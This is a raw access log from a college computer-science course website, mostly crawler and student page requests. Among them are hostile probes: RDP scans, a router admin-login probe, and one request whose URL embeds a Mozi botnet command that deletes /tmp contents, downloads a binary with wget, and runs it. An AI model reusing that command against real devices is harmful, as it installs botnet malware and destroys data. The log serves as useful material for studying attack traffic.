172.58.86.210 - - [01/May/2021:04:51:28 -0500] "GET /js/encode.js?n&datetime=20210501045128 HTTP/1.1" 200 2957 "https://cst.ridgewater.edu/JimMartinson/CST1611/?Assignments" "Mozilla/5.0 (Linux; Android 11; SM-A716U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.91 Mobile Safari/537.36"
172.58.86.210 - - [01/May/2021:04:51:28 -0500] "GET /js/tooltip.js?o&datetime=20210501045128 HTTP/1.1" 200 13888 "https://cst.ridgewater.edu/JimMartinson/CST1611/?Assignments" "Mozilla/5.0 (Linux; Android 11; SM-A716U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.91 Mobile Safari/537.36"
172.58.86.210 - - [01/May/2021:04:51:32 -0500] "POST /Login/ HTTP/1.1" 200 387 "https://cst.ridgewater.edu/JimMartinson/CST1611/?Assignments" "Mozilla/5.0 (Linux; Android 11; SM-A716U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.91 Mobile Safari/537.36"
172.58.86.210 - - [01/May/2021:04:51:33 -0500] "POST /JimMartinson/CST1611/?Assignments HTTP/1.1" 200 30792 "https://cst.ridgewater.edu/Login/" "Mozilla/5.0 (Linux; Android 11; SM-A716U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.91 Mobile Safari/537.36"
172.58.86.210 - - [01/May/2021:04:51:33 -0500] "GET /css/CST.css?datetime=20210501045132 HTTP/1.1" 200 24467 "https://cst.ridgewater.edu/JimMartinson/CST1611/?Assignments" "Mozilla/5.0 (Linux; Android 11; SM-A716U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.91 Mobile Safari/537.36"
172.58.86.210 - - [01/May/2021:04:51:33 -0500] "GET /js/CST.js?S&datetime=20210501045132 HTTP/1.1" 200 12049 "https://cst.ridgewater.edu/JimMartinson/CST1611/?Assignments" "Mozilla/5.0 (Linux; Android 11; SM-A716U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.91 Mobile Safari/537.36"
172.58.86.210 - - [01/May/2021:04:51:33 -0500] "GET /css/tooltip.css?datetime=20210501045132 HTTP/1.1" 200 2300 "https://cst.ridgewater.edu/JimMartinson/CST1611/?Assignments" "Mozilla/5.0 (Linux; Android 11; SM-A716U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.91 Mobile Safari/537.36"
172.58.86.210 - - [01/May/2021:04:51:33 -0500] "GET /js/div.js?i&datetime=20210501045132 HTTP/1.1" 200 7433 "https://cst.ridgewater.edu/JimMartinson/CST1611/?Assignments" "Mozilla/5.0 (Linux; Android 11; SM-A716U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.91 Mobile Safari/537.36"
172.58.86.210 - - [01/May/2021:04:51:33 -0500] "GET /css/debug.css?datetime=20210501045132 HTTP/1.1" 200 17 "https://cst.ridgewater.edu/JimMartinson/CST1611/?Assignments" "Mozilla/5.0 (Linux; Android 11; SM-A716U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.91 Mobile Safari/537.36"
172.58.86.210 - - [01/May/2021:04:51:33 -0500] "GET /js/CollapsibleLists.js?o&datetime=20210501045132 HTTP/1.1" 200 1018 "https://cst.ridgewater.edu/JimMartinson/CST1611/?Assignments" "Mozilla/5.0 (Linux; Android 11; SM-A716U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.91 Mobile Safari/537.36"
172.58.86.210 - - [01/May/2021:04:51:33 -0500] "GET /js/debug.js?e&datetime=20210501045132 HTTP/1.1" 200 10964 "https://cst.ridgewater.edu/JimMartinson/CST1611/?Assignments" "Mozilla/5.0 (Linux; Android 11; SM-A716U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.91 Mobile Safari/537.36"
172.58.86.210 - - [01/May/2021:04:51:33 -0500] "GET /js/tooltip.js?o&datetime=20210501045132 HTTP/1.1" 200 13888 "https://cst.ridgewater.edu/JimMartinson/CST1611/?Assignments" "Mozilla/5.0 (Linux; Android 11; SM-A716U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.91 Mobile Safari/537.36"
172.58.86.210 - - [01/May/2021:04:51:33 -0500] "GET /js/select.js?e&datetime=20210501045132 HTTP/1.1" 200 1790 "https://cst.ridgewater.edu/JimMartinson/CST1611/?Assignments" "Mozilla/5.0 (Linux; Android 11; SM-A716U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.91 Mobile Safari/537.36"
172.58.86.210 - - [01/May/2021:04:51:33 -0500] "GET /js/updateHTMLelement.js?p&datetime=20210501045132 HTTP/1.1" 200 6292 "https://cst.ridgewater.edu/JimMartinson/CST1611/?Assignments" "Mozilla/5.0 (Linux; Android 11; SM-A716U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.91 Mobile Safari/537.36"
216.244.66.248 - - [01/May/2021:04:52:36 -0500] "GET /robots.txt HTTP/1.1" 301 185 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
216.244.66.248 - - [01/May/2021:04:52:36 -0500] "GET /robots.txt HTTP/1.1" 404 169 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
91.220.163.137 - - [01/May/2021:04:53:09 -0500] "\x03\x00\x00/*\xE0\x00\x00\x00\x00\x00Cookie: mstshash=Administr" 400 173 "-" "-"
114.119.140.153 - - [01/May/2021:04:54:13 -0500] "GET /JimMartinson/CST1602/InstructionalGuide.php HTTP/1.1" 200 7142 "-" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
180.149.125.175 - - [01/May/2021:04:54:26 -0500] "GET / HTTP/1.1" 301 185 "-" "Mozilla/5.0 (Windows NT 5.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36"
207.46.13.102 - - [01/May/2021:04:55:31 -0500] "GET /JimMartinson/CST1600/Resources/comp4_unit6b_flash_lecture/player/zoom.html HTTP/1.1" 200 1433 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
35.186.188.225 - - [01/May/2021:04:55:51 -0500] "GET /jeffpolman/cst2702/resources/Hyperterminal%20win7/Hyperterm%20Vista.Win7%20directions.docx HTTP/1.1" 301 185 "-" "Go-http-client/1.1"
35.186.188.225 - - [01/May/2021:04:55:51 -0500] "GET /jeffpolman/cst2702/resources/Hyperterminal%20win7/Hyperterm%20Vista.Win7%20directions.docx HTTP/1.1" 404 169 "http://www.cst.ridgewater.edu/jeffpolman/cst2702/resources/Hyperterminal%20win7/Hyperterm%20Vista.Win7%20directions.docx" "Go-http-client/1.1"
207.46.13.66 - - [01/May/2021:04:57:32 -0500] "GET /Credentials/index.cfm?Credential_ID=1493 HTTP/1.1" 404 169 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
207.46.13.61 - - [01/May/2021:05:00:11 -0500] "GET /Credentials/index.cfm?Credential_ID=1277 HTTP/1.1" 301 185 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
192.241.220.245 - - [01/May/2021:05:01:31 -0500] "GET / HTTP/1.1" 301 185 "-" "Mozilla/5.0 zgrab/0.x"
139.162.231.247 - - [01/May/2021:05:07:36 -0500] "GET /owa/ HTTP/1.1" 404 571 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
66.249.72.168 - - [01/May/2021:05:08:59 -0500] "GET / HTTP/1.1" 200 12396 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.130 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
114.119.132.133 - - [01/May/2021:05:12:25 -0500] "GET /robots.txt HTTP/1.1" 301 185 "-" "Mozilla/5.0 (compatible;PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
216.244.66.248 - - [01/May/2021:05:13:22 -0500] "GET /CSTclub/index.html HTTP/1.1" 200 3450 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
40.77.167.47 - - [01/May/2021:05:14:14 -0500] "GET /robots.txt HTTP/1.1" 301 185 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
40.77.167.47 - - [01/May/2021:05:14:14 -0500] "GET /robots.txt HTTP/1.1" 404 169 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
93.158.90.92 - - [01/May/2021:05:17:08 -0500] "GET / HTTP/1.1" 301 185 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 11.1; rv:84.0) Gecko/20100101 Firefox/84.0"
93.158.90.92 - - [01/May/2021:05:17:09 -0500] "GET / HTTP/1.1" 200 12395 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 11.1; rv:84.0) Gecko/20100101 Firefox/84.0"
93.158.90.92 - - [01/May/2021:05:17:14 -0500] "GET /vmware/ HTTP/1.1" 301 185 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 11.1; rv:84.0) Gecko/20100101 Firefox/84.0"
93.158.90.92 - - [01/May/2021:05:17:15 -0500] "GET /vmware/ HTTP/1.1" 200 6603 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 11.1; rv:84.0) Gecko/20100101 Firefox/84.0"
93.158.90.92 - - [01/May/2021:05:17:19 -0500] "GET /login/ HTTP/1.1" 301 185 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 11.1; rv:84.0) Gecko/20100101 Firefox/84.0"
93.158.90.92 - - [01/May/2021:05:17:20 -0500] "GET /login/ HTTP/1.1" 200 7017 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 11.1; rv:84.0) Gecko/20100101 Firefox/84.0"
93.158.90.92 - - [01/May/2021:05:17:23 -0500] "GET /Zoom/ HTTP/1.1" 301 185 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 11.1; rv:84.0) Gecko/20100101 Firefox/84.0"
93.158.90.92 - - [01/May/2021:05:17:24 -0500] "GET /Zoom/ HTTP/1.1" 200 6751 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 11.1; rv:84.0) Gecko/20100101 Firefox/84.0"
93.158.90.92 - - [01/May/2021:05:17:28 -0500] "GET /StudentProfile/ HTTP/1.1" 301 185 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 11.1; rv:84.0) Gecko/20100101 Firefox/84.0"
93.158.90.92 - - [01/May/2021:05:17:29 -0500] "GET /StudentProfile/ HTTP/1.1" 200 7055 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 11.1; rv:84.0) Gecko/20100101 Firefox/84.0"
93.158.90.92 - - [01/May/2021:05:17:32 -0500] "GET /RockyHyberger/ HTTP/1.1" 301 185 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 11.1; rv:84.0) Gecko/20100101 Firefox/84.0"
93.158.90.92 - - [01/May/2021:05:17:33 -0500] "GET /RockyHyberger/ HTTP/1.1" 200 6318 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 11.1; rv:84.0) Gecko/20100101 Firefox/84.0"
93.158.90.92 - - [01/May/2021:05:17:38 -0500] "GET /JimMartinson/MMDT1021/Schedule/ HTTP/1.1" 301 185 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 11.1; rv:84.0) Gecko/20100101 Firefox/84.0"
93.158.90.92 - - [01/May/2021:05:17:39 -0500] "GET /JimMartinson/MMDT1021/Schedule/ HTTP/1.1" 200 7103 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 11.1; rv:84.0) Gecko/20100101 Firefox/84.0"
93.158.90.92 - - [01/May/2021:05:17:43 -0500] "GET /JimMartinson/CST2505/Schedule.php HTTP/1.1" 301 185 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 11.1; rv:84.0) Gecko/20100101 Firefox/84.0"
93.158.90.92 - - [01/May/2021:05:17:44 -0500] "GET /JimMartinson/CST2505/Schedule.php HTTP/1.1" 200 7109 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 11.1; rv:84.0) Gecko/20100101 Firefox/84.0"
93.158.90.92 - - [01/May/2021:05:17:48 -0500] "GET /JimMartinson/ HTTP/1.1" 301 185 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 11.1; rv:84.0) Gecko/20100101 Firefox/84.0"
93.158.90.92 - - [01/May/2021:05:17:49 -0500] "GET /JimMartinson/ HTTP/1.1" 200 11811 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 11.1; rv:84.0) Gecko/20100101 Firefox/84.0"
93.158.90.92 - - [01/May/2021:05:17:53 -0500] "GET /JeffPolman/ HTTP/1.1" 301 185 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 11.1; rv:84.0) Gecko/20100101 Firefox/84.0"
93.158.90.92 - - [01/May/2021:05:17:54 -0500] "GET /JeffPolman/ HTTP/1.1" 200 5943 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 11.1; rv:84.0) Gecko/20100101 Firefox/84.0"
93.158.90.92 - - [01/May/2021:05:18:00 -0500] "GET /Information/WeatherEmergencies/ HTTP/1.1" 301 185 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 11.1; rv:84.0) Gecko/20100101 Firefox/84.0"
93.158.90.92 - - [01/May/2021:05:18:01 -0500] "GET /Information/WeatherEmergencies/ HTTP/1.1" 200 8005 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 11.1; rv:84.0) Gecko/20100101 Firefox/84.0"
93.158.90.92 - - [01/May/2021:05:18:06 -0500] "GET /Helpdesk/ HTTP/1.1" 301 185 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 11.1; rv:84.0) Gecko/20100101 Firefox/84.0"
93.158.90.92 - - [01/May/2021:05:18:07 -0500] "GET /Helpdesk/ HTTP/1.1" 404 169 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 11.1; rv:84.0) Gecko/20100101 Firefox/84.0"
93.158.90.92 - - [01/May/2021:05:18:11 -0500] "GET /CSTclub/ HTTP/1.1" 301 185 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 11.1; rv:84.0) Gecko/20100101 Firefox/84.0"
93.158.90.92 - - [01/May/2021:05:18:12 -0500] "GET /CSTclub/ HTTP/1.1" 200 3450 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 11.1; rv:84.0) Gecko/20100101 Firefox/84.0"
93.158.90.92 - - [01/May/2021:05:18:16 -0500] "GET /AmyJoMaher/ HTTP/1.1" 301 185 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 11.1; rv:84.0) Gecko/20100101 Firefox/84.0"
93.158.90.92 - - [01/May/2021:05:18:16 -0500] "GET /AmyJoMaher/ HTTP/1.1" 200 5992 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 11.1; rv:84.0) Gecko/20100101 Firefox/84.0"
93.158.90.92 - - [01/May/2021:05:18:21 -0500] "GET /AllenBenusa/ HTTP/1.1" 301 185 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 11.1; rv:84.0) Gecko/20100101 Firefox/84.0"
93.158.90.92 - - [01/May/2021:05:18:22 -0500] "GET /AllenBenusa/ HTTP/1.1" 200 5961 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 11.1; rv:84.0) Gecko/20100101 Firefox/84.0"
93.158.90.92 - - [01/May/2021:05:18:26 -0500] "GET /AdobeConnect/ HTTP/1.1" 301 185 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 11.1; rv:84.0) Gecko/20100101 Firefox/84.0"
93.158.90.92 - - [01/May/2021:05:18:27 -0500] "GET /AdobeConnect/ HTTP/1.1" 200 7978 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 11.1; rv:84.0) Gecko/20100101 Firefox/84.0"
114.119.158.97 - - [01/May/2021:05:19:32 -0500] "GET /robots.txt HTTP/1.1" 404 169 "-" "Mozilla/5.0 (compatible;PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
209.141.33.74 - - [01/May/2021:05:22:08 -0500] "POST /boaform/admin/formLogin HTTP/1.1" 301 185 "http://134.29.175.74:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
209.141.33.74 - - [01/May/2021:05:22:08 -0500] "" 400 0 "-" "-"
40.77.167.70 - - [01/May/2021:05:26:55 -0500] "GET /Credentials/index.cfm?Credential_ID=1764 HTTP/1.1" 301 185 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
192.241.219.45 - - [01/May/2021:05:29:12 -0500] "GET / HTTP/1.1" 200 12397 "-" "Mozilla/5.0 zgrab/0.x"
95.216.96.245 - - [01/May/2021:05:30:56 -0500] "GET /JimMartinson/CST1600/Syllabus.php HTTP/1.1" 200 7110 "https://cst.ridgewater.edu/JimMartinson/CST1600/" "Mozilla/5.0 (compatible; SEOkicks; +https://www.seokicks.de/robot.html)"
95.216.96.245 - - [01/May/2021:05:31:01 -0500] "GET /JimMartinson/CST1602/?Assignments HTTP/1.1" 200 7158 "https://cst.ridgewater.edu/JimMartinson/CST1602/" "Mozilla/5.0 (compatible; SEOkicks; +https://www.seokicks.de/robot.html)"
95.216.96.245 - - [01/May/2021:05:31:04 -0500] "GET /JimMartinson/CST1602/Schedule.php HTTP/1.1" 200 7110 "https://cst.ridgewater.edu/JimMartinson/CST1602/" "Mozilla/5.0 (compatible; SEOkicks; +https://www.seokicks.de/robot.html)"
95.216.96.245 - - [01/May/2021:05:31:07 -0500] "GET /JimMartinson/CST1602/Syllabus.php HTTP/1.1" 200 7110 "https://cst.ridgewater.edu/JimMartinson/CST1602/" "Mozilla/5.0 (compatible; SEOkicks; +https://www.seokicks.de/robot.html)"
95.216.96.245 - - [01/May/2021:05:31:11 -0500] "GET /JimMartinson/CST1611/?Assignments HTTP/1.1" 200 7158 "https://cst.ridgewater.edu/JimMartinson/CST1611/" "Mozilla/5.0 (compatible; SEOkicks; +https://www.seokicks.de/robot.html)"
95.216.96.245 - - [01/May/2021:05:31:13 -0500] "GET /JimMartinson/CST1611/Resources/ HTTP/1.1" 200 611 "https://cst.ridgewater.edu/JimMartinson/CST1611/" "Mozilla/5.0 (compatible; SEOkicks; +https://www.seokicks.de/robot.html)"
95.216.96.245 - - [01/May/2021:05:31:15 -0500] "GET /JimMartinson/CST1611/Syllabus.php HTTP/1.1" 200 7110 "https://cst.ridgewater.edu/JimMartinson/CST1611/" "Mozilla/5.0 (compatible; SEOkicks; +https://www.seokicks.de/robot.html)"
95.216.96.245 - - [01/May/2021:05:31:18 -0500] "GET /JimMartinson/CST2881/InstructionalGuide.php HTTP/1.1" 200 7140 "https://cst.ridgewater.edu/JimMartinson/CST2881/" "Mozilla/5.0 (compatible; SEOkicks; +https://www.seokicks.de/robot.html)"
95.216.96.245 - - [01/May/2021:05:31:21 -0500] "GET /JimMartinson/CST2881/Resources/ HTTP/1.1" 200 346 "https://cst.ridgewater.edu/JimMartinson/CST2881/" "Mozilla/5.0 (compatible; SEOkicks; +https://www.seokicks.de/robot.html)"
95.216.96.245 - - [01/May/2021:05:31:23 -0500] "GET /JimMartinson/CST2881/Syllabus.php HTTP/1.1" 200 7110 "https://cst.ridgewater.edu/JimMartinson/CST2881/" "Mozilla/5.0 (compatible; SEOkicks; +https://www.seokicks.de/robot.html)"
95.216.96.245 - - [01/May/2021:05:31:27 -0500] "GET /JimMartinson/CST2950/InstructionalGuide.php HTTP/1.1" 404 36 "https://cst.ridgewater.edu/JimMartinson/CST2950/" "Mozilla/5.0 (compatible; SEOkicks; +https://www.seokicks.de/robot.html)"
207.46.13.102 - - [01/May/2021:05:37:08 -0500] "GET /JimMartinson/CST2950/ HTTP/1.1" 301 185 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
66.249.72.170 - - [01/May/2021:05:38:58 -0500] "GET /jeffpolman/CST2840/resources/presentations/ch08.ppt HTTP/1.1" 301 185 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.130 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.72.168 - - [01/May/2021:05:38:59 -0500] "GET /jeffpolman/CST2840/resources/presentations/ch08.ppt HTTP/1.1" 404 571 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.130 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
35.247.93.60 - - [01/May/2021:05:39:26 -0500] "GET /jeffpolman/CST1701/resources/1701%20for%20students/Study%20Guide%20worksheets/SEMESTER_2_Chapter_1KEY%5B1%5D.doc HTTP/1.1" 301 185 "-" "Go-http-client/1.1"
35.247.93.60 - - [01/May/2021:05:39:26 -0500] "GET /jeffpolman/CST1701/resources/1701%20for%20students/Study%20Guide%20worksheets/SEMESTER_2_Chapter_1KEY%5B1%5D.doc HTTP/1.1" 404 169 "http://www.cst.ridgewater.edu/jeffpolman/CST1701/resources/1701%20for%20students/Study%20Guide%20worksheets/SEMESTER_2_Chapter_1KEY%5B1%5D.doc" "Go-http-client/1.1"
207.46.13.102 - - [01/May/2021:05:46:10 -0500] "GET /jeffpolman/CST2840/resources/Acorn%20Apartment%20Layout.pdf HTTP/1.1" 301 185 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
185.191.171.5 - - [01/May/2021:05:46:42 -0500] "GET /robots.txt HTTP/1.1" 404 169 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
185.191.171.14 - - [01/May/2021:05:47:32 -0500] "GET /JimMartinson/CST1025/Resources/Links/NetworkingBasics/Networking%20Basics.URL HTTP/1.1" 499 0 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
185.191.171.14 - - [01/May/2021:05:48:22 -0500] "GET /JimMartinson/CST1025/Resources/Links/NetworkingBasics/Networking%20Basics.URL HTTP/1.1" 499 0 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
35.247.93.60 - - [01/May/2021:05:50:06 -0500] "GET /jeffpolman/CST2702/CST2702syllabus.pdf HTTP/1.1" 301 185 "-" "Go-http-client/1.1"
35.247.93.60 - - [01/May/2021:05:50:06 -0500] "GET /jeffpolman/CST2702/CST2702syllabus.pdf HTTP/1.1" 404 169 "http://cst.ridgewater.edu/jeffpolman/CST2702/CST2702syllabus.pdf" "Go-http-client/1.1"
40.77.167.98 - - [01/May/2021:05:50:28 -0500] "GET /JimMartinson/CST1025/Resources/ComputerNetworks/auxiliary_files/mininet/multitrunk12.py HTTP/1.1" 200 3432 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
194.48.199.121 - - [01/May/2021:05:52:09 -0500] "GET / HTTP/1.1" 200 12397 "-" "-"
40.77.167.70 - - [01/May/2021:05:52:55 -0500] "GET /Credentials/index.cfm?Credential_ID=1022 HTTP/1.1" 404 169 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
91.220.163.62 - - [01/May/2021:05:54:22 -0500] "\x03\x00\x00/*\xE0\x00\x00\x00\x00\x00Cookie: mstshash=Administr" 400 173 "-" "-"
114.119.139.35 - - [01/May/2021:05:54:44 -0500] "GET /JeffPolman/CST2504/resources/LabSim/comptia_a-_pa_(220-702)3CE4DA347676.pdf HTTP/1.1" 301 185 "-" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
114.119.139.35 - - [01/May/2021:05:54:45 -0500] "GET /JeffPolman/CST2504/resources/LabSim/comptia_a-_pa_(220-702)3CE4DA347676.pdf HTTP/1.1" 404 169 "-" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
194.48.199.121 - - [01/May/2021:06:00:19 -0500] "GET / HTTP/1.1" 200 12397 "-" "-"
66.249.72.170 - - [01/May/2021:06:08:59 -0500] "GET / HTTP/1.1" 200 12396 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
120.82.116.236 - - [01/May/2021:06:12:05 -0500] "GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1" 301 185 "-" "Hello, world"
207.46.13.112 - - [01/May/2021:06:13:25 -0500] "GET /jeffpolman/CST1701/resources/Lab%20Checkoff%20sheet.doc HTTP/1.1" 404 169 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
207.46.13.112 - - [01/May/2021:06:13:25 -0500] "GET /Credentials/index.cfm?Credential_ID=2153 HTTP/1.1" 301 185 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
207.46.13.66 - - [01/May/2021:06:14:32 -0500] "GET /JimMartinson/CST1510/Resources/Previous%20Editions/Original%20PC%20Reference.pdf HTTP/1.1" 301 185 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
66.249.72.172 - - [01/May/2021:06:17:26 -0500] "GET / HTTP/1.1" 301 185 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.84 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.72.168 - - [01/May/2021:06:17:27 -0500] "GET / HTTP/1.1" 200 12396 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.84 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
207.46.13.102 - - [01/May/2021:06:22:31 -0500] "GET /Credentials/index.cfm?Credential_ID=1116 HTTP/1.1" 301 185 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
207.46.13.98 - - [01/May/2021:06:22:53 -0500] "GET /jeffpolman/CST2845/resources/asteriskNow%20iso/asterisk.now.1.7.1/ HTTP/1.1" 301 185 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
213.194.126.113 - - [01/May/2021:06:25:09 -0500] "GET /wp-login.php HTTP/1.1" 404 36 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
95.216.96.245 - - [01/May/2021:06:31:02 -0500] "GET /JimMartinson/CST2950/Syllabus.php HTTP/1.1" 404 36 "https://cst.ridgewater.edu/JimMartinson/CST2950/" "Mozilla/5.0 (compatible; SEOkicks; +https://www.seokicks.de/robot.html)"
95.216.96.245 - - [01/May/2021:06:31:07 -0500] "GET /JimMartinson/MMDT1021/?Assignments HTTP/1.1" 200 7161 "https://cst.ridgewater.edu/JimMartinson/MMDT1021/" "Mozilla/5.0 (compatible; SEOkicks; +https://www.seokicks.de/robot.html)"
95.216.96.245 - - [01/May/2021:06:31:10 -0500] "GET /JimMartinson/MMDT1021/Resources/ HTTP/1.1" 200 1036 "https://cst.ridgewater.edu/JimMartinson/MMDT1021/" "Mozilla/5.0 (compatible; SEOkicks; +https://www.seokicks.de/robot.html)"
95.216.96.245 - - [01/May/2021:06:31:12 -0500] "GET /JimMartinson/MMDT1021/Syllabus/ HTTP/1.1" 200 7104 "https://cst.ridgewater.edu/JimMartinson/MMDT1021/" "Mozilla/5.0 (compatible; SEOkicks; +https://www.seokicks.de/robot.html)"
95.216.96.245 - - [01/May/2021:06:31:15 -0500] "GET /JimMartinson/MMDT2146/?Assignments HTTP/1.1" 200 7161 "https://cst.ridgewater.edu/JimMartinson/MMDT2146/" "Mozilla/5.0 (compatible; SEOkicks; +https://www.seokicks.de/robot.html)"
95.216.96.245 - - [01/May/2021:06:31:19 -0500] "GET /JimMartinson/MMDT2146/Resources/ HTTP/1.1" 200 882 "https://cst.ridgewater.edu/JimMartinson/MMDT2146/" "Mozilla/5.0 (compatible; SEOkicks; +https://www.seokicks.de/robot.html)"
95.216.96.245 - - [01/May/2021:06:31:22 -0500] "GET /JimMartinson/MMDT2146/Syllabus.php HTTP/1.1" 200 6471 "https://cst.ridgewater.edu/JimMartinson/MMDT2146/" "Mozilla/5.0 (compatible; SEOkicks; +https://www.seokicks.de/robot.html)"
66.249.72.168 - - [01/May/2021:06:33:16 -0500] "GET /js/tooltip.js?o&datetime=20210501061727 HTTP/1.1" 200 13888 "https://cst.ridgewater.edu/" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.130 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
